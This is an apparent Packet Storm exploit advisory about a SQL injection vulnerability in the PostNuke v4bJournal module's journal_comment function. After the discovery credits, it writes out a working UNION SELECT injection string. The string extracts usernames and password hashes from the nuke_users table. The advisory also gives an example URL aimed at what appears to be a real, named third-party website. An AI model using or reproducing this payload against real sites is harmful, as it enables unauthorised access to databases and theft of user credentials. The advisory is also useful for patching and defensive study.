The PostNuke module v4bJournal suffers from a remote SQL injection vulnerability.
a0ecdd31d3ae0393c44a1d1b3dab0a3dab2e3af46d6cdb8269f2721967ff45bc----------------------------------------
PostNuke Journal
----------------------------------------
DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
Greetz For All Y! UnderGround Group Members ( www.2600.ir )
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
Contact: abbasi@ustmb.ac.ir
{SQL BUG}
in
index.php?module=v4bJournal&func=journal_comment&id=(SQL)
------------------------------------------
EXPLIOT BY :ABDUCTER
Greetz For ABDUCTER Real Friend Nanos (Nancy)
Contact: ABDUCTER_MINDS@YAHOO.COM
index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
EX:-
http://www.arsfoodcourt.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
U must regrister first ( You Most Register First )
-------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed